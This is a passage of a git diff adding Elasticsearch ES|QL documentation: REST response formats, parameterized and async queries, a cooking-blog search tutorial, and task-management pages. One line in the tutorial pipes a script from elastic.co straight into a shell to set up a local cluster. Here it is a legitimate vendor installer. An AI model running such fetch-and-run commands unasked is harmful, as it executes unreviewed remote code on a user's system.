readable and binary formats. You can set the format by specifying the `format` parameter in the URL or by setting the `Accept` or `Content-Type` HTTP header. + +For example: + +```console +POST /_query?format=yaml +``` + +::::{note} +The URL parameter takes precedence over the HTTP headers. If neither is specified then the response is returned in the same format as the request. +:::: + +#### Structured formats + +Complete responses with metadata. Useful for automatic parsing. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `json` | `application/json` | [JSON](https://www.json.org/) (JavaScript Object Notation) human-readable format | +| `yaml` | `application/yaml` | [YAML](https://en.wikipedia.org/wiki/YAML) (YAML Ain’t Markup Language) human-readable format | + +#### Tabular formats + +Query results only, without metadata. Useful for quick and manual data previews. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `csv` | `text/csv` | [Comma-separated values](https://en.wikipedia.org/wiki/Comma-separated_values) | +| `tsv` | `text/tab-separated-values` | [Tab-separated values](https://en.wikipedia.org/wiki/Tab-separated_values) | +| `txt` | `text/plain` | CLI-like representation | + +::::{tip} +The `csv` format accepts a formatting URL query attribute, `delimiter`, which indicates which character should be used to separate the CSV values. It defaults to comma (`,`) and cannot take any of the following values: double quote (`"`), carriage-return (`\r`) and new-line (`\n`). The tab (`\t`) can also not be used. Use the `tsv` format instead. +:::: + +#### Binary formats + +Compact binary encoding. To be used by applications. + +| `format` | HTTP header | Description | +| --- | --- | --- | +| `cbor` | `application/cbor` | [Concise Binary Object Representation](https://cbor.io/) | +| `smile` | `application/smile` | [Smile](https://en.wikipedia.org/wiki/Smile_(data_interchange_format)) binary data format similarto CBOR | +| `arrow` | `application/vnd.apache.arrow.stream` | **Experimental.** [Apache Arrow](https://arrow.apache.org/) dataframes, [IPC streaming format](https://arrow.apache.org/docs/format/Columnar.html#ipc-streaming-format) | + + +### Filtering using {{es}} Query DSL [esql-rest-filtering] + +Specify a Query DSL query in the `filter` parameter to filter the set of documents that an {{esql}} query runs on. + +```console +POST /_query?format=txt +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """, + "filter": { + "range": { + "page_count": { + "gte": 100, + "lte": 200 + } + } + } +} +``` + +Which returns: + +```text + author | name | page_count | release_date +---------------+------------------------------------+---------------+------------------------ +Douglas Adams |The Hitchhiker's Guide to the Galaxy|180 |1979-10-12T00:00:00.000Z +``` + + +### Columnar results [esql-rest-columnar] + +By default, {{esql}} returns results as rows. For example, `FROM` returns each individual document as one row. For the `json`, `yaml`, `cbor` and `smile` [formats](#esql-rest-format), {{esql}} can return the results in a columnar fashion where one row represents all the values of a certain column in the results. + +```console +POST /_query?format=json +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """, + "columnar": true +} +``` + +Which returns: + +```console-result +{ + "took": 28, + "is_partial": false, + "columns": [ + {"name": "author", "type": "text"}, + {"name": "name", "type": "text"}, + {"name": "page_count", "type": "integer"}, + {"name": "release_date", "type": "date"} + ], + "values": [ + ["Peter F. Hamilton", "Vernor Vinge", "Frank Herbert", "Alastair Reynolds", "James S.A. Corey"], + ["Pandora's Star", "A Fire Upon the Deep", "Dune", "Revelation Space", "Leviathan Wakes"], + [768, 613, 604, 585, 561], + ["2004-03-02T00:00:00.000Z", "1992-06-01T00:00:00.000Z", "1965-06-01T00:00:00.000Z", "2000-03-15T00:00:00.000Z", "2011-06-02T00:00:00.000Z"] + ] +} +``` + + +### Returning localized results [esql-locale-param] + +Use the `locale` parameter in the request body to return results (especially dates) formatted per the conventions of the locale. If `locale` is not specified, defaults to `en-US` (English). Refer to [JDK Supported Locales](https://www.oracle.com/java/technologies/javase/jdk17-suported-locales.html). + +Syntax: the `locale` parameter accepts language tags in the (case-insensitive) format `xy` and `xy-XY`. + +For example, to return a month name in French: + +```console +POST /_query +{ + "locale": "fr-FR", + "query": """ + ROW birth_date_string = "2023-01-15T00:00:00.000Z" + | EVAL birth_date = date_parse(birth_date_string) + | EVAL month_of_birth = DATE_FORMAT("MMMM",birth_date) + | LIMIT 5 + """ +} +``` + + +### Passing parameters to a query [esql-rest-params] + +Values, for example for a condition, can be passed to a query "inline", by integrating the value in the query string itself: + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > 300 AND author == "Frank Herbert" + | STATS count = COUNT(*) by year + | WHERE count > 0 + | LIMIT 5 + """ +} +``` + +To avoid any attempts of hacking or code injection, extract the values in a separate list of parameters. Use question mark placeholders (`?`) in the query string for each of the parameters: + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ? AND author == ? + | STATS count = COUNT(*) by year + | WHERE count > ? + | LIMIT 5 + """, + "params": [300, "Frank Herbert", 0] +} +``` + +The parameters can be named parameters or positional parameters. + +Named parameters use question mark placeholders (`?`) followed by a string. + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ?page_count AND author == ?author + | STATS count = COUNT(*) by year + | WHERE count > ?count + | LIMIT 5 + """, + "params": [{"page_count" : 300}, {"author" : "Frank Herbert"}, {"count" : 0}] +} +``` + +Positional parameters use question mark placeholders (`?`) followed by an integer. + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ?1 AND author == ?2 + | STATS count = COUNT(*) by year + | WHERE count > ?3 + | LIMIT 5 + """, + "params": [300, "Frank Herbert", 0] +} +``` + + +### Running an async {{esql}} query [esql-rest-async-query] + +The [{{esql}} async query API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query) lets you asynchronously execute a query request, monitor its progress, and retrieve results when they become available. + +Executing an {{esql}} query is commonly quite fast, however queries across large data sets or frozen data can take some time. To avoid long waits, run an async {{esql}} query. + +Queries initiated by the async query API may return results or not. The `wait_for_completion_timeout` property determines how long to wait for the results. If the results are not available by this time, a [query id](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query#esql-async-query-api-response-body-query-id) is returned which can be later used to retrieve the results. For example: + +```console +POST /_query/async +{ + "query": """ + FROM library + | EVAL year = DATE_TRUNC(1 YEARS, release_date) + | STATS MAX(page_count) BY year + | SORT year + | LIMIT 5 + """, + "wait_for_completion_timeout": "2s" +} +``` + +If the results are not available within the given timeout period, 2 seconds in this case, no results are returned but rather a response that includes: + +* A query ID +* An `is_running` value of *true*, indicating the query is ongoing + +The query continues to run in the background without blocking other requests. + +```console-result +{ + "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", + "is_running": true +} +``` + +To check the progress of an async query, use the [{{esql}} async query get API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get) with the query ID. Specify how long you’d like to wait for complete results in the `wait_for_completion_timeout` parameter. + +```console +GET /_query/async/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?wait_for_completion_timeout=30s +``` + +If the response’s `is_running` value is `false`, the query has finished and the results are returned, along with the `took` time for the query. + +```console-result +{ + "is_running": false, + "took": 48, + "columns": ... +} +``` + +To stop a running async query and return the results computed so far, use the [async stop API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-stop) with the query ID. + +```console +POST /_query/async/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/stop +``` +The query will be stopped and the response will contain the results computed so far. The response format is the same as the `get` API. + +```console-result +{ + "is_running": false, + "took": 48, + "is_partial": true, + "columns": ... +} +``` +This API can be used to retrieve results even if the query has already completed, as long as it's within the `keep_alive` window. +The `is_partial` field indicates result completeness. A value of `true` means the results are potentially incomplete. + +Use the [{{esql}} async query delete API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete) to delete an async query before the `keep_alive` period ends. If the query is still running, {{es}} cancels it. + +```console +DELETE /_query/async/FmdMX2pIang3UWhLRU5QS0lqdlppYncaMUpYQ05oSkpTc3kwZ21EdC1tbFJXQToxOTI= +``` + +::::{note} +You will also receive the async ID and running status in the `X-Elasticsearch-Async-Id` and `X-Elasticsearch-Async-Is-Running` HTTP headers of the response, respectively. +Useful if you use a tabular text format like `txt`, `csv` or `tsv`, as you won't receive those fields in the body there. +:::: diff --git a/docs/reference/query-languages/esql/esql-search-tutorial.md b/docs/reference/query-languages/esql/esql-search-tutorial.md new file mode 100644 index 0000000000000..61c1c7b871199 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-search-tutorial.md @@ -0,0 +1,475 @@ +--- +applies_to: + stack: preview 9.0, ga 9.1 + serverless: ga +navigation_title: Search and filter with ES|QL +--- + +# Search and filter with {{esql}} + +This is a hands-on introduction to the basics of full-text search and semantic search, using {{esql}}. + +In this scenario, we're implementing search for a cooking blog. The blog contains recipes with various attributes including textual content, categorical data, and numerical ratings. + +## Requirements + +You need a running {{es}} cluster, together with {{kib}} to use the Dev Tools API Console. Refer to [choose your deployment type](docs-content://deploy-manage/deploy.md#choosing-your-deployment-type) for deployment options. + +Want to get started quickly? Run the following command in your terminal to set up a [single-node local cluster in Docker](docs-content://deploy-manage/deploy/self-managed/local-development-installation-quickstart.md): + +```sh +curl -fsSL https://elastic.co/start-local | sh +``` + +## Running {{esql}} queries + +In this tutorial, {{esql}} examples are displayed in the following format: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| LIMIT 1000 +``` + +If you want to run these queries in the [Dev Tools Console](/reference/query-languages/esql/esql-rest.md#esql-kibana-console), you need to use the following syntax: + +```console +POST /_query?format=txt +{ + "query": """ + FROM cooking_blog + | WHERE description:"fluffy pancakes" + | LIMIT 1000 + """ +} +``` + +If you'd prefer to use your favorite programming language, refer to [Client libraries](docs-content://solutions/search/site-or-app/clients.md) for a list of official and community-supported clients. + +## Step 1: Create an index + +Create the `cooking_blog` index to get started: + +```console +PUT /cooking_blog +``` + +Now define the mappings for the index: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "title": { + "type": "text", + "analyzer": "standard", <1> + "fields": { <2> + "keyword": { + "type": "keyword", + "ignore_above": 256 <3> + } + } + }, + "description": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "author": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "date": { + "type": "date", + "format": "yyyy-MM-dd" + }, + "category": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "tags": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "rating": { + "type": "float" + } + } +} +``` + +1. `analyzer`: Used for text analysis. If you don't specify it, the `standard` analyzer is used by default for `text` fields. It’s included here for demonstration purposes. To know more about analyzers, refer to [Anatomy of an analyzer](docs-content://manage-data/data-store/text-analysis/anatomy-of-an-analyzer.md). +2. `ignore_above`: Prevents indexing values longer than 256 characters in the `keyword` field. This is the default value and it’s included here for demonstration purposes. It helps to save disk space and avoid potential issues with Lucene’s term byte-length limit. For more information, refer [ignore_above parameter](/reference/elasticsearch/mapping-reference/ignore-above.md). +3. `description`: A field declared with both `text` and `keyword` [data types](/reference/elasticsearch/mapping-reference/field-data-types.md). Such fields are called [Multi-fields](/reference/elasticsearch/mapping-reference/multi-fields.md). This enables both full-text search and exact matching/filtering on the same field. If you use [dynamic mapping](docs-content://manage-data/data-store/mapping/dynamic-field-mapping.md), these multi-fields will be created automatically. Other fields in the mapping like `author`, `category`, `tags` are also declared as multi-fields. + +::::{tip} +Full-text search is powered by [text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md). Text analysis normalizes and standardizes text data so it can be efficiently stored in an inverted index and searched in near real-time. Analysis happens at both [index and search time](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md). This tutorial won't cover analysis in detail, but it's important to understand how text is processed to create effective search queries. +:::: + +## Step 2: Add sample blog posts to your index [full-text-filter-tutorial-index-data] + +Next, you’ll need to index some example blog posts using the [Bulk API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-settings). Note that `text` fields are analyzed and multi-fields are generated at index time. + +```console +POST /cooking_blog/_bulk?refresh=wait_for +{"index":{"_id":"1"}} +{"title":"Perfect Pancakes: A Fluffy Breakfast Delight","description":"Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds. This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.","author":"Maria Rodriguez","date":"2023-05-01","category":"Breakfast","tags":["pancakes","breakfast","easy recipes"],"rating":4.8} +{"index":{"_id":"2"}} +{"title":"Spicy Thai Green Curry: A Vegetarian Adventure","description":"Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.","author":"Liam Chen","date":"2023-05-05","category":"Main Course","tags":["thai","vegetarian","curry","spicy"],"rating":4.6} +{"index":{"_id":"3"}} +{"title":"Classic Beef Stroganoff: A Creamy Comfort Food","description":"Indulge in this rich and creamy beef stroganoff. Tender strips of beef in a savory mushroom sauce, served over a bed of egg noodles. It's the ultimate comfort food for chilly evenings.","author":"Emma Watson","date":"2023-05-10","category":"Main Course","tags":["beef","pasta","comfort food"],"rating":4.7} +{"index":{"_id":"4"}} +{"title":"Vegan Chocolate Avocado Mousse","description":"Discover the magic of avocado in this rich, vegan chocolate mousse. Creamy, indulgent, and secretly healthy, it's the perfect guilt-free dessert for chocolate lovers.","author":"Alex Green","date":"2023-05-15","category":"Dessert","tags":["vegan","chocolate","avocado","healthy dessert"],"rating":4.5} +{"index":{"_id":"5"}} +{"title":"Crispy Oven-Fried Chicken","description":"Get that perfect crunch without the deep fryer! This oven-fried chicken recipe delivers crispy, juicy results every time. A healthier take on the classic comfort food.","author":"Maria Rodriguez","date":"2023-05-20","category":"Main Course","tags":["chicken","oven-fried","healthy"],"rating":4.9} +``` + +## Step 3: Basic search operations + +Full-text search involves executing text-based queries across one or more document fields. In this section, you'll start with simple text matching and build up to understanding how search results are ranked. + +{{esql}} provides multiple functions for full-text search, including `MATCH`, `MATCH_PHRASE`, and `QSTR`. For basic text matching, you can use either: + +1. Full [match function](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match) syntax: `match(field, "search terms")` +2. Compact syntax using the [match operator `:`](/reference/query-languages/esql/functions-operators/operators.md#esql-match-operator): `field:"search terms"` + +Both are equivalent for basic matching and can be used interchangeably. The compact syntax is more concise, while the function syntax allows for more configuration options. We use the compact syntax in most examples for brevity. + +Refer to the [`MATCH` function](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match) reference docs for advanced parameters available with the function syntax. + +### Perform your first search query + +Let's start with the simplest possible search - looking for documents that contain specific words: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| LIMIT 1000 +``` + +This query searches the `description` field for documents containing either "fluffy" OR "pancakes" (or both). By default, {{esql}} uses OR logic between search terms, so it matches documents that contain any of the specified words. + +### Control which fields appear in results + +You can specify the exact fields to include in your results using the `KEEP` command: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| KEEP title, description, rating +| LIMIT 1000 +``` + +This helps reduce the amount of data returned and focuses on the information you need. + +### Understand relevance scoring + +Search results can be ranked based on how well they match your query. To calculate and use relevance scores, you need to explicitly request the `_score` metadata: + +```esql +FROM cooking_blog METADATA _score +| WHERE description:"fluffy pancakes" +| KEEP title, description, _score +| SORT _score DESC +| LIMIT 1000 +``` + +Notice two important things: +1. `METADATA _score` tells {{esql}} to include relevance scores in the results +2. `SORT _score DESC` orders results by relevance (highest scores first) + +If you don't include `METADATA _score` in your query, you won't see relevance scores in your results. This means you won't be able to sort by relevance or filter based on relevance scores. + +Without explicit sorting, results aren't ordered by relevance even when scores are calculated. If you want the most relevant results first, you must sort by `_score`, by explicitly using `SORT _score DESC` or `SORT _score ASC`. + +:::{tip} +When you include `METADATA _score`, search functions included in `WHERE` conditions contribute to the relevance score. Filtering operations (like range conditions and exact matches) don't affect the score. +::: + +### Find exact matches + +Sometimes you need exact matches rather than full-text search. Use the `.keyword` field for case-sensitive exact matching: + +```esql +FROM cooking_blog +| WHERE category.keyword == "Breakfast" # Exact match (case-sensitive) +| KEEP title, category, rating +| SORT rating DESC +| LIMIT 1000 +``` + +This is fundamentally different from full-text search - it's a binary yes/no filter that doesn't affect relevance scoring. + +## Step 4: Search precision control + +Now that you understand basic searching, explore how to control the precision of your text matches. + +### Require all search terms (AND logic) + +By default, searches with match use OR logic between terms. To require ALL terms to match, use the function syntax with the `operator` parameter to specify AND logic: + +```esql +FROM cooking_blog +| WHERE match(description, "fluffy pancakes", {"operator": "AND"}) +| LIMIT 1000 +``` + +This stricter search returns *zero hits* on our sample data, as no document contains both "fluffy" and "pancakes" in the description. + +:::{note} +The `MATCH` function with AND logic doesn't require terms to be adjacent or in order. It only requires that all terms appear somewhere in the field. Use `MATCH_PHRASE` to [search for exact phrases](#search-for-exact-phrases). +::: + +### Set a minimum number of terms to match + +Sometimes requiring all terms is too strict, but the default OR behavior is too lenient. You can specify a minimum number of terms that must match: + +```esql +FROM cooking_blog +| WHERE match(title, "fluffy pancakes breakfast", {"minimum_should_match": 2}) +| LIMIT 1000 +``` + +This query searches the title field to match at least 2 of the 3 terms: "fluffy", "pancakes", or "breakfast". + +### Search for exact phrases + +When you need to find documents containing an exact sequence of words, use the `MATCH_PHRASE` function: + +```esql +FROM cooking_blog +| WHERE MATCH_PHRASE(description, "rich and creamy") +| KEEP title, description +| LIMIT 1000 +``` + +This query only matches documents where the words "rich and creamy" appear exactly in that order in the description field. + +## Step 5: Semantic search and hybrid search + +### Index semantic content + +{{es}} allows you to semantically search for documents based on the meaning of the text, rather than just the presence of specific keywords. This is useful when you want to find documents that are conceptually similar to a given query, even if they don't contain the exact search terms. + +ES|QL supports semantic search when your mappings include fields of the [`semantic_text`](/reference/elasticsearch/mapping-reference/semantic-text.md) type. This example mapping update adds a new field called `semantic_description` with the type `semantic_text`: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "semantic_description": { + "type": "semantic_text" + } + } +} +``` + +Next, index a document with content into the new field: + +```console +POST /cooking_blog/_doc +{ + "title": "Mediterranean Quinoa Bowl", + "semantic_description": "A protein-rich bowl with quinoa, chickpeas, fresh vegetables, and herbs. This nutritious Mediterranean-inspired dish is easy to prepare and perfect for a quick, healthy dinner.", + "author": "Jamie Oliver", + "date": "2023-06-01", + "category": "Main Course", + "tags": ["vegetarian", "healthy", "mediterranean", "quinoa"], + "rating": 4.7 +} +``` + +### Perform semantic search + +Once the document has been processed by the underlying model running on the inference endpoint, you can perform semantic searches. Here's an example natural language query against the `semantic_description` field: + +```esql +FROM cooking_blog +| WHERE semantic_description:"What are some easy to prepare but nutritious plant-based meals?" +| LIMIT 5 +``` + +:::{tip} +If you'd like to test out the semantic search workflow against a large dataset, follow the [semantic-search-tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md). +::: + +### Perform hybrid search + +You can combine full-text and semantic queries. In this example we combine full-text and semantic search with custom weights: + +```esql +FROM cooking_blog METADATA _score +| WHERE match(semantic_description, "easy to prepare vegetarian meals", { "boost": 0.75 }) + OR match(tags, "vegetarian", { "boost": 0.25 }) +| SORT _score DESC +| LIMIT 5 +``` + +This query searches the `semantic_description` field for documents that are semantically similar to "easy to prepare vegetarian meals" with a higher weight, while also matching the `tags` field for "vegetarian" with a lower weight. The results are sorted by relevance score. + +Learn how to combine these with complex criteria in [Step 8](#step-8-complex-search-solutions). + +## Step 6: Advanced search features + +Once you're comfortable with basic search precision, use the following advanced features for powerful search capabilities. + +### Use query string for complex patterns + +The `QSTR` function enables powerful search patterns using a compact query language. It's ideal for when you need wildcards, fuzzy matching, and boolean logic in a single expression: + +```esql +FROM cooking_blog +| WHERE QSTR(description, "fluffy AND pancak* OR (creamy -vegan)") +| KEEP title, description +| LIMIT 1000 +``` + +Query string syntax lets you: +- Use boolean operators: `AND`, `OR`, `-` (NOT) +- Apply wildcards: `pancak*` matches "pancake" and "pancakes" +- Enable fuzzy matching: `pancake~1` for typo tolerance +- Group terms: `(thai AND curry) OR pasta` +- Search exact phrases: `"fluffy pancakes"` +- Search across fields: `QSTR("title,description", "pancake OR (creamy AND rich)")` + +### Search across multiple fields + +When users enter a search query, they often don't know (or care) whether their search terms appear in a specific field. You can search across multiple fields simultaneously: + +```esql +FROM cooking_blog +| WHERE title:"vegetarian curry" OR description:"vegetarian curry" OR tags:"vegetarian curry" +| LIMIT 1000 +``` + +This query searches for "vegetarian curry" across the title, description, and tags fields. Each field is treated with equal importance. + +### Weight different fields + +In many cases, matches in certain fields (like the title) might be more relevant than others. You can adjust the importance of each field using boost scoring: + +```esql +FROM cooking_blog METADATA _score +| WHERE match(title, "vegetarian curry", {"boost": 2.0}) # Title matches are twice as important + OR match(description, "vegetarian curry") + OR match(tags, "vegetarian curry") +| KEEP title, description, tags, _score +| SORT _score DESC +| LIMIT 1000 +``` + +## Step 7: Filtering and exact matching + +Filtering allows you to narrow down your search results based on exact criteria. Unlike full-text searches, filters are binary (yes/no) and do not affect the relevance score. Filters execute faster than queries because excluded results don't need to be scored. + +### Basic filtering by category + +```esql +FROM cooking_blog +| WHERE category.keyword == "Breakfast" # Exact match using keyword field +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +### Date range filtering + +Often users want to find content published within a specific time frame: + +```esql +FROM cooking_blog +| WHERE date >= "2023-05-01" AND date <= "2023-05-31" # Inclusive date range filter +| KEEP title, author, date, rating +| LIMIT 1000 +``` + +### Numerical range filtering + +Filter by ratings or other numerical values: + +```esql +FROM cooking_blog +| WHERE rating >= 4.5 # Only highly-rated recipes +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +### Exact author matching + +Find recipes by a specific author: + +```esql +FROM cooking_blog +| WHERE author.keyword == "Maria Rodriguez" # Exact match on author +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +## Step 8: Complex search solutions + +Real-world search often requires combining multiple types of criteria. This section shows how to build sophisticated search experiences. + +### Combine filters with full-text search + +Mix filters, full-text search, and custom scoring in a single query: + +```esql +FROM cooking_blog METADATA _score +| WHERE rating >= 4.5 # Numerical filter + AND NOT category.keyword == "Dessert" # Exclusion filter + AND (title:"curry spicy" OR description:"curry spicy") # Full-text search in multiple fields +| SORT _score DESC +| KEEP title, author, rating, tags, description +| LIMIT 1000 +``` + +### Advanced relevance scoring + +For complex relevance scoring with combined criteria, you can use the `EVAL` command to calculate custom scores: + +```esql +FROM cooking_blog METADATA _score +| WHERE NOT category.keyword == "Dessert" +| EVAL tags_concat = MV_CONCAT(tags.keyword, ",") # Convert multi-value field to string +| WHERE tags_concat LIKE "*vegetarian*" AND rating >= 4.5 # Wildcard pattern matching +| WHERE match(title, "curry spicy", {"boost": 2.0}) OR match(description, "curry spicy") +| EVAL category_boost = CASE(category.keyword == "Main Course", 1.0, 0.0) # Conditional boost +| EVAL date_boost = CASE(DATE_DIFF("month", date, NOW()) <= 1, 0.5, 0.0) # Boost recent content +| EVAL custom_score = _score + category_boost + date_boost # Combine scores +| WHERE custom_score > 0 # Filter based on custom score +| SORT custom_score DESC +| LIMIT 1000 +``` + +## Learn more + +### Documentation + +This tutorial introduced the basics of search and filtering in {{esql}}. Building a real-world search experience requires understanding many more advanced concepts and techniques. Here are some resources once you're ready to dive deeper: + +- [Search with {{esql}}](docs-content://solutions/search/esql-for-search.md): Learn about all the search capabilities in ES|QL, refer to Using ES|QL for search. {{esql}}. +- [{{esql}} search functions](/reference/query-languages/esql/functions-operators/search-functions.md): Explore the full list of search functions available in {{esql}}. +- [Semantic search](docs-content://solutions/search/semantic-search.md): Understand your various options for semantic search in Elasticsearch. + - [The `semantic_text` workflow](docs-content://solutions/search/semantic-search.md#_semantic_text_workflow): Learn how to use the `semantic_text` field type for semantic search. This is the recommended approach for most users looking to perform semantic search in {{es}}, because it abstracts away the complexity of setting up inference endpoints and models. + +### Related blog posts + +- [{{esql}}, you know for Search](https://www.elastic.co/search-labs/blog/esql-introducing-scoring-semantic-search): Introducing scoring and semantic search +- [Introducing full text filtering in {{esql}}](https://www.elastic.co/search-labs/blog/filtering-in-esql-full-text-search-match-qstr): Overview of {{esql}}'s text filtering capabilities diff --git a/docs/reference/query-languages/esql/esql-syntax.md b/docs/reference/query-languages/esql/esql-syntax.md index 248c85ddd95d6..ea941563e0728 100644 --- a/docs/reference/query-languages/esql/esql-syntax.md +++ b/docs/reference/query-languages/esql/esql-syntax.md @@ -159,7 +159,7 @@ FROM library } ``` -You can also use [query parameters](docs-content://explore-analyze/query-filter/languages/esql-rest.md#esql-rest-params) in function named parameters: +You can also use [query parameters](/reference/query-languages/esql/esql-rest.md#esql-rest-params) in function named parameters: ```console POST /_query diff --git a/docs/reference/query-languages/esql/esql-task-management.md b/docs/reference/query-languages/esql/esql-task-management.md new file mode 100644 index 0000000000000..a7351591719e3 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-task-management.md @@ -0,0 +1,57 @@ +--- +navigation_title: List running queries +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-task-management.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + + + +# Find long-running {{esql}} queries [esql-task-management] + + +You can list running {{esql}} queries with the [task management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks): + +$$$esql-task-management-get-all$$$ + +```console +GET /_tasks?pretty&detailed&group_by=parents&human&actions=*data/read/esql +``` + +Which returns a list of statuses like this: + +```js +{ + "node" : "2j8UKw1bRO283PMwDugNNg", + "id" : 5326, + "type" : "transport", + "action" : "indices:data/read/esql", + "description" : "FROM test | STATS MAX(d) by a, b", <1> + "start_time" : "2023-07-31T15:46:32.328Z", + "start_time_in_millis" : 1690818392328, + "running_time" : "41.7ms", <2> + "running_time_in_nanos" : 41770830, + "cancellable" : true, + "cancelled" : false, + "headers" : { } +} +``` + +1. The user submitted query. +2. Time the query has been running. + + +You can use this to find long running queries and, if you need to, cancel them with the [task cancellation API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks#task-cancellation): + +$$$esql-task-management-cancelEsqlQueryRequestTests$$$ + +```console +POST _tasks/2j8UKw1bRO283PMwDugNNg:5326/_cancel +``` + +It may take a few seconds for the query to be stopped. + diff --git a/docs/reference/query-languages/esql/esql-troubleshooting.md b/docs/reference/query-languages/esql/esql-troubleshooting.md new file mode 100644 index 0000000000000..696de0d42f5b2 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-troubleshooting.md @@ -0,0 +1,10 @@ +--- +navigation_title: "Troubleshooting" +--- + +# Troubleshooting {{esql}} [esql-troubleshooting] + +This section provides some useful resource for troubleshooting {{esql}} issues: + +- [Query log](esql-query-log.md): Learn how to log {{esql}} queries +- [Task management API](esql-task-management.md): Learn how to diagnose issues like long-running queries. diff --git a/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md b/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md index d954260eb8f44..04858c66a0390 100644 --- a/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md @@ -7,7 +7,7 @@ mapped_pages: # {{esql}} aggregation functions [esql-aggregation-functions] -The [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command supports these aggregate functions: +The [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command supports these aggregate functions: :::{include} ../_snippets/lists/aggregation-functions.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/grouping-functions.md b/docs/reference/query-languages/esql/functions-operators/grouping-functions.md index dab4fc1cc46e2..7cd02febec968 100644 --- a/docs/reference/query-languages/esql/functions-operators/grouping-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/grouping-functions.md @@ -7,7 +7,7 @@ mapped_pages: # {{esql}} grouping functions [esql-group-functions] -The [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command supports these grouping functions: +The [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command supports these grouping functions: :::{include} ../_snippets/lists/grouping-functions.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/math-functions.md b/docs/reference/query-languages/esql/functions-operators/math-functions.md index 2a4cb855717d7..99c7c7394191a 100644 --- a/docs/reference/query-languages/esql/functions-operators/math-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/math-functions.md @@ -33,6 +33,9 @@ mapped_pages: :::{include} ../_snippets/functions/layout/ceil.md ::: +:::{include} ../_snippets/functions/layout/copy_sign.md +::: + :::{include} ../_snippets/functions/layout/cos.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/search-functions.md b/docs/reference/query-languages/esql/functions-operators/search-functions.md index bf31cce7df3ca..597f61cfc5003 100644 --- a/docs/reference/query-languages/esql/functions-operators/search-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/search-functions.md @@ -8,7 +8,7 @@ mapped_pages: :::{tip} Get started with {{esql}} for search use cases with -our [hands-on tutorial](docs-content://solutions/search/esql-search-tutorial.md). +our [hands-on tutorial](/reference/query-languages/esql/esql-search-tutorial.md). For a high-level overview of search functionalities in {{esql}}, and to learn about relevance scoring, refer to [{{esql}} for search](docs-content://solutions/search/esql-for-search.md#esql-for-search-scoring). ::: diff --git a/docs/reference/query-languages/esql/images/functions/copy_sign.svg b/docs/reference/query-languages/esql/images/functions/copy_sign.svg new file mode 100644 index 0000000000000..82455b59b1eda --- /dev/null +++ b/docs/reference/query-languages/esql/images/functions/copy_sign.svg @@ -0,0 +1 @@ 